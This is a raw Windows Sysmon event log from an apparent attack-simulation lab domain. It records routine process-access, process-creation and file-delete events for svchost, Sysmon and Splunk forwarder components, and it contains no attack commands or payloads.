08:02:25.052{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809376Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.052{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809375Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.052{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809374Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.052{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809373Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.052{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809372Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.052{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809371Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.052{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809370Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.052{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F711-60EB-BA79-00000000D001}3584C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809369Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.052{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F711-60EB-BA79-00000000D001}3584C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809368Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.037{0C1E0330-F711-60EB-BA79-00000000D001}3584C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000809424Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.880{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F712-60EB-BD79-00000000D001}1172C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809423Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.880{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809422Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.880{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809421Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.880{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809420Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.880{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809419Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.880{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809418Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.880{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809417Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.880{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809416Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.864{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809415Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.864{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809414Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.864{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F712-60EB-BD79-00000000D001}1172C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809413Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.864{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F712-60EB-BD79-00000000D001}1172C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809412Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.865{0C1E0330-F712-60EB-BD79-00000000D001}1172C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809411Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.833{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=20CE7151493F53D5DB3B040B893706B1,SHA256=4CFBFE593CAB7E3FD63BDB5069C277236EEA2F04FBC42B66035455361BD45222,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809410Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.724{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAB179748012E7C55210E3DE6DFBD5C5,SHA256=ED3CEA18504E0C5ADAC1B6EACB87853D84A3358E3844A46E983CA391111DD875,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052613Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:26.132{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3363D755CE522F39DA557C4E4044575B,SHA256=82ECBE1C649868969344B9182AC168134FA90F3BD1A4010E5B971DC19A57EC54,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809409Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.302{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F712-60EB-BC79-00000000D001}2292C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809408Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.302{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809407Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 